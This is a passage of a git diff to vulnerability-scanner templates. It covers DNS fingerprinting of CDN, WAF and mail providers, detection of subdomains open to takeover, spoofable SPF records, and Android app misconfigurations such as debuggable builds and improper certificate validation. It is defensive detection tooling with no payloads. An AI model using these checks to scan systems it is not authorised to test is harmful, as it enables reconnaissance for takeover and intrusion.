"azurewebsites.net" + - "azurewebsites.windows.net" + - "blob.core.windows.net" + - "cloudapp.azure.com" + - "cloudapp.net" + - "database.windows.net" + - "redis.cache.windows.net" + - "search.windows.net" + - "servicebus.windows.net" + - "visualstudio.com" + - "-msedge.net" + - "trafficmanager.net" + + - type: word + part: answer + name: zendesk + words: + - "zendesk.com" + + - type: word + part: answer + name: announcekit + words: + - "cname.announcekit.app" + + - type: word + part: answer + name: wix + words: + - "wixdns.net" + + - type: word + part: answer + name: akamai-cdn + words: + - akadns.net + - akagtm.org + - akahost.net + - akam.net + - akamai.com + - akamai.net + - akamaiedge-staging.net + - akamaiedge.net + - akamaientrypoint.net + - akamaihd.net + - akamaistream.net + - akamaitech.net + - akamaitechnologies.com + - akamaitechnologies.fr + - akamaized.net + - akaquill.net + - akasecure.net + - akasripcn.net + - edgekey.net + - edgesuite.net + + - type: word + part: answer + name: cloudflare-cdn + words: + - cloudflare.net + - cloudflare-dm-cmpimg.com + - cloudflare-ipfs.com + - cloudflare-quic.com + - cloudflare-terms-of-service-abuse.com + - cloudflare.com + - cloudflare.net + - cloudflare.tv + - cloudflareaccess.com + - cloudflareclient.com + - cloudflareinsights.com + - cloudflareok.com + - cloudflareportal.com + - cloudflareresolve.com + - cloudflaressl.com + - cloudflarestatus.com + - sn-cloudflare.com + + - type: word + part: answer + name: amazon-cloudfront + words: + - cloudfront.net + + - type: word + part: answer + name: salesforce + words: + - salesforce.com + - siteforce.com + - force.com + + - type: word + part: answer + name: amazon-aws + words: + - amazonaws.com + - elasticbeanstalk.com + - awsglobalaccelerator.com + + - type: word + part: answer + name: fastly-cdn + words: + - fastly.net + + - type: word + part: answer + name: netlify + words: + - netlify.app + - netlify.com + - netlifyglobalcdn.com + + - type: word + part: answer + name: vercel + words: + - vercel.app + + - type: word + part: answer + name: sendgrid + words: + - sendgrid.net + - sendgrid.com + + - type: word + part: answer + name: qualtrics + words: + - qualtrics.com + + - type: word + part: answer + name: heroku + words: + - herokuapp.com + - herokucdn.com + - herokudns.com + - herokussl.com + - herokuspace.com + + - type: word + part: answer + name: gitlab + words: + - gitlab.com + - gitlab.io + + - type: word + part: answer + name: perforce-akana + words: + - akana.com + - apiportal.akana.com + + - type: word + part: answer + name: skilljar + words: + - skilljarapp.com + + - type: word + part: answer + name: datagrail + words: + - datagrail.io + + - type: word + part: answer + name: platform.sh + words: + - platform.sh + + - type: word + part: answer + name: folloze + words: + - folloze.com + + - type: word + part: answer + name: pendo-receptive + words: + - receptive.io + - pendo.io + + - type: word + part: answer + name: discourse + words: + - bydiscourse.com + - discourse-cdn.com + - discourse.cloud + - discourse.org + - hosted-by-discourse.com + + - type: word + part: answer + name: adobe-marketo + words: + - marketo.com + - marketo.co.uk + - mktoweb.com + - mktossl.com + - mktoweb.com + + - type: word + part: answer + name: adobe-marketo - 'mkto-.{5,8}\.com' + + - type: word + part: answer + name: adobe-marketo + words: + - marketo.com + + - type: word + part: answer + name: rock-content + words: + - postclickmarketing.com + - rockcontent.com + - rockstage.io + + - type: word + part: answer + name: rocketlane + words: + - rocketlane.com + + - type: word + part: answer + name: webflow + words: + - proxy-ssl.webflow.com + + - type: word + part: answer + name: stacker-hq + words: + - stacker.app + + - type: word + part: answer + name: hubspot + words: + - hs-analytics.net + - hs-banner.com + - hs-scripts.com + - hsappstatic.net + - hscollectedforms.net + - hscoscdn00.net + - hscoscdn10.net + - hscoscdn20.net + - hscoscdn30.net + - hscoscdn40.net + - hsforms.com + - hsforms.net + - hubapi.com + - hubspot.com + - hubspot.es + - hubspot.net + - hubspotemail.net + - hubspotlinks.com + - hubspotusercontent-na1.net + - sidekickopen90.com + - usemessages.com + + - type: word + part: answer + name: gitbook + words: + - gitbook.com + - gitbook.io + + - type: word + part: answer + name: google-firebase + words: + - fcm.googleapis.com + - firebase.com + - firebase.google.com + - firebase.googleapis.com + - firebaseapp.com + - firebaseappcheck.googleapis.com + - firebasedynamiclinks-ipv4.googleapis.com + - firebasedynamiclinks-ipv6.googleapis.com + - firebasedynamiclinks.googleapis.com + - firebaseinappmessaging.googleapis.com + - firebaseinstallations.googleapis.com + - firebaseio.com + - firebaselogging-pa.googleapis.com + - firebaselogging.googleapis.com + - firebaseperusertopics-pa.googleapis.com + - firebaseremoteconfig.googleapis.com + + - type: word + part: answer + name: zendesk + words: + - zdassets.com + - zdorigin.com + - "zendesk.com" + - zopim.com + + - type: word + part: answer + name: imperva + words: + - incapdns.net + - incapsula.com + + - type: word + part: answer + name: proofpoint + words: + - infoprtct.com + - metanetworks.com + - ppe-hosted.com + - pphosted.com + - proofpoint.com + + - type: word + part: answer + name: q4-investor-relations + words: + - q4inc.com + - q4ir.com + - q4web.com + + - type: word + part: answer + name: google-hosted + words: + - appspot.com + - cloudfunctions.net + - ghs.googlehosted.com + - ghs4.googlehosted.com + - ghs46.googlehosted.com + - ghs6.googlehosted.com + - googlehosted.com + - googlehosted.l.googleusercontent.com + - run.app + + - type: word + part: answer + name: wp-engine + words: + - wpengine.com + + - type: word + part: answer + name: github + words: + - github.com + - github.io + - githubusercontent.com + + - type: word + part: answer + name: ghost + words: + - ghost.io + + - type: word + part: answer + name: digital-ocean + words: + - ondigitalocean.app + + - type: word + part: answer + name: typedream + words: + - ontypedream.com + + - type: word + part: answer + name: oracle-eloqua-marketing + words: + - hs.eloqua.com + + - type: regex + part: answer + regex: + - "IN\tCNAME\\t(.+)$" + - "IN\\s*CNAME\\t(.+)$" + +# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950 diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index cecd6d809e..05aaa5c995 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -7,9 +7,9 @@ info: description: A DNS WAF was detected. classification: cwe-id: CWE-200 - tags: tech,waf,dns metadata: max-request: 2 + tags: tech,waf,dns dns: - name: "{{FQDN}}" @@ -17,57 +17,66 @@ dns: - name: "{{FQDN}}" type: NS - matchers: - type: word + part: answer name: sanfor-shield words: - ".sangfordns.com" - type: word + part: answer name: 360panyun words: - ".360panyun.com" - type: word + part: answer name: baiduyun words: - ".yunjiasu-cdn.net" - type: word + part: answer name: chuangyudun words: - ".365cyd.cn" - ".cyudun.net" - type: word + part: answer name: knownsec words: - ".jiashule.com" - ".jiasule.org" - type: word + part: answer name: huaweicloud words: - ".huaweicloudwaf.com" - type: word + part: answer name: xinliuyun words: - ".ngaagslb.cn" - type: word + part: answer name: chinacache words: - ".chinacache.net" - ".ccgslb.net" - type: word + part: answer name: nscloudwaf words: - ".nscloudwaf.com" - type: word + part: answer name: wangsu words: - ".wsssec.com" @@ -85,17 +94,20 @@ dns: - ".mwcloudcdn.com" - type: word + part: answer name: qianxin words: - ".360safedns.com" - ".360cloudwaf.com" - type: word + part: answer name: baiduyunjiasu words: - ".yunjiasu-cdn.net" - type: word + part: answer name: anquanbao words: - ".anquanbao.net" @@ -114,60 +126,71 @@ dns: - '\.aliyundunwaf\.com' - type: word + part: answer name: xuanwudun words: - ".saaswaf.com" - ".dbappwaf.cn" - type: word + part: answer name: yundun words: - ".hwwsdns.cn" - ".yunduncname.com" - type: word + part: answer name: knownsec-ns words: - ".jiasule.net" - type: word + part: answer name: chuangyudun words: - ".365cyd.net" - type: word + part: answer name: qianxin words: - ".360wzb.com" - type: word + part: answer name: anquanbao words: - ".anquanbao.com" - type: word + part: answer name: wangsu words: - ".chinanetcenter.com" - type: word + part: answer name: baiduyunjiasue words: - ".ns.yunjiasu.com" - type: word + part: answer name: chinacache words: - ".chinacache.com" - type: word + part: answer name: cloudflare words: - "ns.cloudflare.com" - type: word + part: answer name: edns words: - ".iidns.com" -# Enhanced by mp on 2022/03/13 +# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950 diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index e8521c2652..3f9452f6ef 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -10,17 +10,17 @@ info: - https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ classification: cwe-id: CWE-200 - tags: dns,dnssec metadata: max-request: 1 + tags: dns,dnssec dns: - name: "{{FQDN}}" type: DS - matchers: - type: regex + part: answer regex: - - "IN\tDS\t(.+)" + - "IN\tDS\\t(.+)$" -# Enhanced by mp on 2022/03/14 +# digest: 4b0a00483046022100dd7c45e1b16ab7caba75d6b28a27e3678896daad8cc2413e3f9120efa8be540202210095b8145af0ff47b2c140dc6f9f643f058bb31768759be99af4098f2cbd0d1997:922c64590222798bb761d5b6d8e72950 diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index 2149bb5ecb..cc95bc1353 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -9,9 +9,9 @@ info: - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state classification: cwe-id: CWE-200 - tags: dns,ec2,aws metadata: max-request: 1 + tags: dns,ec2,aws dns: - name: "{{FQDN}}" @@ -23,4 +23,4 @@ dns: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" -# Enhanced by mp on 2022/03/14 +# digest: 4a0a00473045022100995379438eef7d1b9435317e2326c27b32ff7c257437185c9bf505dc30d972e002202882175b25ec22258156a75b31ed020bfcdc29ababcd9e052ce591ab2acb3ff8:922c64590222798bb761d5b6d8e72950 diff --git a/dns/elasticbeantalk-takeover.yaml b/dns/elasticbeanstalk-takeover.yaml similarity index 57% rename from dns/elasticbeantalk-takeover.yaml rename to dns/elasticbeanstalk-takeover.yaml index b6acc316d0..77d4c519a7 100644 --- a/dns/elasticbeantalk-takeover.yaml +++ b/dns/elasticbeanstalk-takeover.yaml @@ -1,11 +1,10 @@ -id: elasticbeantalk-takeover +id: elasticbeanstalk-takeover info: - name: ElasticBeanTalk Subdomain Takeover Detection - author: philippedelteil,rotemreiss,zy9ard3 + name: ElasticBeanstalk Subdomain Takeover Detection + author: philippedelteil,rotemreiss,zy9ard3,joaonevess severity: high - description: ElasticBeanTalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical - name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. + description: ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 - https://twitter.com/payloadartist/status/1362035009863880711 @@ -33,19 +32,17 @@ dns: matchers-condition: and matchers: - - type: regex regex: - - CNAME\t[a-z0-9_-]*\.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com + - CNAME\t[a-z0-9_-]*\.(us|af|ap|ca|eu|me|sa|il)\-(north|east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com - type: word words: - - "NXDOMAIN" + - NXDOMAIN extractors: - - type: regex - group: 1 - regex: - - "IN\tCNAME\t(.+)" + - type: dsl + dsl: + - cname -# Enhanced by mp on 2022/03/14 +# digest: 4b0a00483046022100b17bf9a80ae6819d64cc1a58b2cf349b843548dcbfd9d9455230cace98f79b04022100cec30c98b7df5b5d7d359146fb95c16c511856e3d7648b50b0a3e671e4b81b01:922c64590222798bb761d5b6d8e72950 diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml index c6de4a20ee..d0b7f228e0 100644 --- a/dns/mx-fingerprint.yaml +++ b/dns/mx-fingerprint.yaml @@ -10,18 +10,18 @@ info: - https://mxtoolbox.com/ classification: cwe-id: CWE-200 - tags: dns,mx metadata: max-request: 1 + tags: dns,mx dns: - name: "{{FQDN}}" type: MX - matchers: - - type: word - words: - - "IN\tMX" + - type: regex + part: answer + regex: + - "IN\tMX\\t(.+)$" extractors: - type: regex @@ -29,4 +29,4 @@ dns: regex: - "IN\tMX\t(.+)" -# Enhanced by mp on 2022/03/14 +# digest: 4a0a0047304502205efe2d8fc4f39144631e42eaf8d4e45773974e43ff3d2db923203db6e044be4d022100c3fb0ba12d80ceff4ea27c45f1a3380ff6727b8a747803d3899a255fb2672f0f:922c64590222798bb761d5b6d8e72950 diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index f2ebd382e9..9f4cb91b7a 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -7,9 +7,9 @@ info: description: An email service was detected. Check the email service or spam filter that is used for a domain. classification: cwe-id: CWE-200 - tags: dns,service metadata: max-request: 1 + tags: dns,service dns: - name: "{{FQDN}}" @@ -82,4 +82,4 @@ dns: - "mx1-us1.ppe-hosted.com" - "mx2-us1.ppe-hosted.com" -# Enhanced by mp on 2022/03/14 +# digest: 4b0a0048304602210099a2fc7473ed27cd6def422387ade50932830f42a13a93928782b060f911f4bf0221009505a43f95011404d692365315d646406918c54d2829546a2312d4d67440ac0e:922c64590222798bb761d5b6d8e72950 diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml index 0dc25c93e8..10c1810203 100644 --- a/dns/nameserver-fingerprint.yaml +++ b/dns/nameserver-fingerprint.yaml @@ -7,18 +7,18 @@ info: description: An NS record was detected. An NS record delegates a subdomain to a set of name servers. classification: cwe-id: CWE-200 - tags: dns,ns metadata: max-request: 1 + tags: dns,ns dns: - name: "{{FQDN}}" type: NS - matchers: - - type: word - words: - - "IN\tNS" + - type: regex + part: answer + regex: + - "IN\tNS\\t(.+)$" extractors: - type: regex @@ -26,4 +26,4 @@ dns: regex: - "IN\tNS\t(.+)" -# Enhanced by mp on 2022/03/14 +# digest: 4a0a0047304502201ea440eb1f3de07432e12f94f89b2db94a960b7e41bf0a985db8454471217852022100ea06c3b9f829f1e4cbdd3e2ce32b039e0cf6150525202a42361133fb321794fc:922c64590222798bb761d5b6d8e72950 diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml index 35d5ce91b2..175ac67905 100644 --- a/dns/ptr-fingerprint.yaml +++ b/dns/ptr-fingerprint.yaml @@ -7,18 +7,18 @@ info: description: A PTR record was detected. A PTR record refers to the domain name. classification: cwe-id: CWE-200 - tags: dns,ptr metadata: max-request: 1 + tags: dns,ptr dns: - name: "{{FQDN}}" type: PTR - matchers: - - type: word - words: - - "IN\tPTR" + - type: regex + part: answer + regex: + - "IN\tPTR\\t(.+)$" extractors: - type: regex @@ -26,4 +26,4 @@ dns: regex: - "IN\tPTR\t(.+)" -# Enhanced by mp on 2022/03/14 +# digest: 490a00463044022028a8f25e5f2d2d00e9aa403a801265be54f6889185388c416baef105d9b58193022011b971c138e5bf8e83bd52bc68b65f3c7ac9c81a43320629549465a1bc8be1d3:922c64590222798bb761d5b6d8e72950 diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index a3e2577710..3ee1dfbb9d 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -4,22 +4,20 @@ info: name: DNS Servfail Host Finder author: pdteam severity: info - description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary - networking issue. + description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary networking issue. classification: cwe-id: CWE-200 - tags: dns,takeover metadata: max-request: 1 + tags: dns,takeover dns: - name: "{{FQDN}}" type: A - matchers: - type: word words: - "SERVFAIL" - "REFUSED" -# Enhanced by mp on 2022/03/14 +# digest: 4a0a0047304502201e4ab6d52233b5600ef7e9f54060934699002359838bd2802d602b642154ea1402210094809cea67fc9ad6c8a472142c8b3afb960c5e5cb3dfdd6708cb84f411a1790f:922c64590222798bb761d5b6d8e72950 diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index 23cf2711ed..b4714064e6 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -9,14 +9,13 @@ info: - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability classification: cwe-id: CWE-200 - tags: dns,spf metadata: max-request: 1 + tags: dns,spf dns: - name: "{{FQDN}}" type: TXT - matchers: - type: word words: @@ -24,4 +23,4 @@ dns: - " ptr " condition: and -# Enhanced by mp on 2022/03/14 +# digest: 4a0a00473045022100dcb965b47233e3942f4879e832d145cc6ade3ddc990891e0ff365e8209a6aa8302201ecdb55e85d79a9c4e2d585fd8ce7b83e7549fb3bc257be05038e166b73ec1a6:922c64590222798bb761d5b6d8e72950 diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml index fee487487b..50e6075612 100644 --- a/dns/txt-fingerprint.yaml +++ b/dns/txt-fingerprint.yaml @@ -9,18 +9,18 @@ info: - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/ classification: cwe-id: CWE-200 - tags: dns,txt metadata: max-request: 1 + tags: dns,txt dns: - name: "{{FQDN}}" type: TXT - matchers: - - type: word - words: - - "IN\tTXT" + - type: regex + part: answer + regex: + - "IN\tTXT\\t(.+)$" extractors: - type: regex @@ -28,4 +28,4 @@ dns: regex: - "IN\tTXT\t(.+)" -# Enhanced by mp on 2022/03/14 +# digest: 4b0a00483046022100e4559c121d9f67b4f8ae256bc1310808d8b5223de95617f4043356431e9d65e50221008b74ba8f34d3497f956434868c133d05dfe8408acdcfa3480f7cd64284dee17a:922c64590222798bb761d5b6d8e72950 diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index 73a3a6d422..fdcf126750 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -9,17 +9,16 @@ info: - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites classification: cwe-id: CWE-200 - tags: dns,service metadata: max-request: 1 + tags: dns,service dns: - name: "{{FQDN}}" type: A - matchers: - type: word words: - "69.164.223.206" -# Enhanced by mp on 2022/03/14 +# digest: 4a0a0047304502205f67d327d32f1d0c1060ed655d0fa32415cd9c82a90d37b6edd56c72c001e3d9022100a3955a69d030743492077d921ae562a00dce69a8def4abad33b18f0a982a8a0e:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/adb-backup-enabled.yaml b/file/android/adb-backup-enabled.yaml index 5c756ded96..5a455022f9 100644 --- a/file/android/adb-backup-enabled.yaml +++ b/file/android/adb-backup-enabled.yaml @@ -5,13 +5,12 @@ info: author: gaurang severity: low description: ADB Backup is enabled, which allows the backup and restore of an app's private data. + remediation: Ensure proper access or disable completely. reference: - https://adb-backup.com/ classification: cwe-id: CWE-200 - remediation: Ensure proper access or disable completely. tags: android,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: words: - "android:allowBackup=\"true\"" -# Enhanced by mp on 2022/02/09 +# digest: 490a00463044022079148ddcb17d63e510878ffcf923d2c9074822a68a15975e82dfacf0b823b75b02201099b266190b9e360ff401f621c9b6e6362c5bdcc37de07adc1c01c379307ad0:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/biometric-detect.yaml b/file/android/biometric-detect.yaml index 002dcf825a..1bb7cc705b 100644 --- a/file/android/biometric-detect.yaml +++ b/file/android/biometric-detect.yaml @@ -1,17 +1,23 @@ id: biometric-detect info: - name: Biometric or Fingerprint detect + name: Android Biometric/Fingerprint - Detect author: gaurang severity: info + description: Android Biometric/Fingerprint permission files were detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: - "android.permission.USE_FINGERPRINT" - - "android.permission.USE_BIOMETRIC" \ No newline at end of file + - "android.permission.USE_BIOMETRIC" + +# Enhanced by md on 2023/05/02 +# digest: 4b0a00483046022100f43f7c82a443df1bdd1728b98b23a3d63aaa901d0338bf24a418fa62aa5b99c3022100d42fbf9d55efd87f006503421e1589c32046deb9fe240809156c321d870cfec9:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/certificate-validation.yaml b/file/android/certificate-validation.yaml index 64a9fecc52..710992c54d 100644 --- a/file/android/certificate-validation.yaml +++ b/file/android/certificate-validation.yaml @@ -1,16 +1,22 @@ id: improper-certificate-validation info: - name: Improper Certificate Validation + name: Android Improper Certificate Validation - Detect author: gaurang severity: medium + description: Android improper certificate validation was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: - - "Landroid/webkit/SslErrorHandler;->proceed()V" \ No newline at end of file + - "Landroid/webkit/SslErrorHandler;->proceed()V" + +# Enhanced by md on 2023/05/02 +# digest: 4a0a00473045022100aef4ef4ea43eae93cb0373d207d40684412a63044e33386a05852840b2ee110702203dce816c57358a4a1b8ddf362be46263693e4295e9bcff78bfd6d7f2e32f6cd3:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/content-scheme.yaml b/file/android/content-scheme.yaml index f60d6a6607..a499f0e6ba 100644 --- a/file/android/content-scheme.yaml +++ b/file/android/content-scheme.yaml @@ -1,16 +1,22 @@ id: content-scheme info: - name: Content Scheme Enabled + name: Android Content Scheme - Detect author: gaurang severity: info + description: Android content scheme enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: android,file - file: - extensions: - xml - matchers: - type: word words: - - "android:scheme=\"content\"" \ No newline at end of file + - "android:scheme=\"content\"" + +# Enhanced by md on 2023/05/03 +# digest: 4a0a0047304502201ca83928239ca3b0a3219fa4f2907f800eb31702bca0f70be096d4c26d041343022100a07bae71e1117a4eee7953c74184cb2bc2ee89e96b8c9af492bd20f66e6e9a6c:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index 1825b7d030..e24da4be9d 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -4,13 +4,14 @@ info: name: Android Debug Enabled author: gaurang severity: low + description: Android debug enabling was detected. tags: android,file - file: - extensions: - all - matchers: - type: regex regex: - - "android:debuggable=\"true\"" \ No newline at end of file + - "android:debuggable=\"true\"" + +# digest: 4a0a0047304502203616fe532eee00daa7402f8e6595e34c0ce7bc19cc6777f164d069adb081267e022100cf17913c42a3a234371ca0236fbd066317c53d36b3c6ceabffb130eeffadbcf8:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/deep-link-detect.yaml b/file/android/deep-link-detect.yaml index 9836dc9e0c..3d09627662 100644 --- a/file/android/deep-link-detect.yaml +++ b/file/android/deep-link-detect.yaml @@ -1,17 +1,21 @@ id: deep-link-detect info: - name: Deep Link Detection + name: Android Deep Link - Detect author: Hardik-Solanki severity: info + description: Android deep link functionality was detected. reference: - https://developer.android.com/training/app-links/deep-linking - https://www.geeksforgeeks.org/deep-linking-in-android-with-example/ - https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: verified: true tags: android,file,deeplink - file: - extensions: - xml @@ -24,3 +28,6 @@ file: - "android:host" - "android:name" condition: and + +# Enhanced by md on 2023/05/02 +# digest: 490a0046304402207edbcd24d76af152b6368274009d835e0462d0256c4e99c2819ca0f9e691ec34022078cfca39b64958091ac474623fb5bdc89f79e3e0e716ecc706b092fd003b9987:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/dynamic-broadcast-receiver.yaml b/file/android/dynamic-broadcast-receiver.yaml index d2ea9a6123..474b4b429c 100644 --- a/file/android/dynamic-broadcast-receiver.yaml +++ b/file/android/dynamic-broadcast-receiver.yaml @@ -1,16 +1,22 @@ id: dynamic-registered-broadcast-receiver info: - name: Dynamic Registered Broadcast Receiver + name: Android Dynamic Broadcast Receiver Register - Detect author: gaurang severity: info + description: Android dynamic broadcast receiver register functionality was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: - - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" \ No newline at end of file + - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" + +# Enhanced by md on 2023/05/02 +# digest: 490a0046304402200a21274be70d274c77c63cf66b98e1d17b14fcbfff10995feefc37a44c7cbc6a022076339e3fbebc6122b4991b64b1c1208697e31560886e2d86f5a0ac665c582758:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/file-scheme.yaml b/file/android/file-scheme.yaml index e7f14543f8..605b1e2373 100644 --- a/file/android/file-scheme.yaml +++ b/file/android/file-scheme.yaml @@ -1,16 +1,22 @@ id: file-scheme info: - name: File Scheme Enabled + name: Android File Scheme - Detect author: gaurang severity: info + description: Android file scheme enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: android,file - file: - extensions: - xml - matchers: - type: word words: - - "android:scheme=\"file\"" \ No newline at end of file + - "android:scheme=\"file\"" + +# Enhanced by md on 2023/05/03 +# digest: 4a0a00473045022100e1b3965f57f869c3babac5d0d8eaab8473fbd547ede00744e8e2dc2bb683f10c02200491a767c6fda145c2b792a960fdfac4f541c9ae9db0256dcffc1b858d9ddd13:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/google-storage-bucket.yaml b/file/android/google-storage-bucket.yaml new file mode 100644 index 0000000000..b1ee0bd983 --- /dev/null +++ b/file/android/google-storage-bucket.yaml @@ -0,0 +1,20 @@ +id: google-storage-bucket + +info: + name: Google Storage Bucket - Detection + author: Thabisocn + severity: info + metadata: + verified: "true" + github-query: "/[a-z0-9.-]+\\.appspot\\.com/" + tags: file,android,google +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "[a-z0-9.-]+\\.appspot\\.com" + +# digest: 4b0a00483046022100f5b1873c8bca743330c13ec8aa0470d0456310ee42d1afcf58efba79f1a645720221008f58f9cff9e8ccfea0b4a3d8e6ed14c9d20c5ddb8d6106f113a6ff0d28f29b62:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/provider-path.yaml b/file/android/provider-path.yaml index ed4810852d..edb3751133 100644 --- a/file/android/provider-path.yaml +++ b/file/android/provider-path.yaml @@ -1,17 +1,23 @@ id: insecure-provider-path info: - name: Insecure Provider Path + name: Android Insecure Provider Path - Detect author: gaurang severity: medium + description: Android insecure provider path was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: regex regex: - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\"" - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\"" + +# Enhanced by md on 2023/05/02 +# digest: 4b0a00483046022100c7a1b1c2556047998abaef0b98976b35c8058ceaa66838bf8711c30ef2cf36980221009595cab483ee1f8c602d9d2c936db350b1d8622fb32470d74e62e88c43c72452:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/webview-addjavascript-interface.yaml b/file/android/webview-addjavascript-interface.yaml index 06e26a26dd..5a57c8f6d3 100644 --- a/file/android/webview-addjavascript-interface.yaml +++ b/file/android/webview-addjavascript-interface.yaml @@ -1,16 +1,22 @@ id: webview-addjavascript-interface info: - name: Webview addJavascript Interface Usage + name: Android WebView Add Javascript Interface - Detect author: gaurang severity: info + description: Android WebView Add Javascript interface usage was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file - file: - extensions: - all - matchers: - type: word words: - - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" \ No newline at end of file + - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" + +# Enhanced by md on 2023/05/02 +# digest: 490a0046304402203981bdb59f2dcb96fc32d914a6ad857c3ab9cc7a7e13721fbb70d5e02d56479602203f304de4f54bc79bb48097452fe53cf82aed0a50741027791fecdc92909a32a0:922c64590222798bb761d5b6d8e72950 diff --git a/file/android/webview-javascript.yaml b/file/android/webview-javascript.yaml index 34f4b7bfc1..22692eba77 100644 --- a/file/android/webview-javascript.yaml +++ b/file/android/webview-javascript.yaml @@ -1,16 +1,22 @@ id: webview-javascript-enabled info: - name: Webview JavaScript enabled + name: WebView JavaScript - Detect author: gaurang severity: info + description: WebView Javascript enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: android,file,javascript - file: - 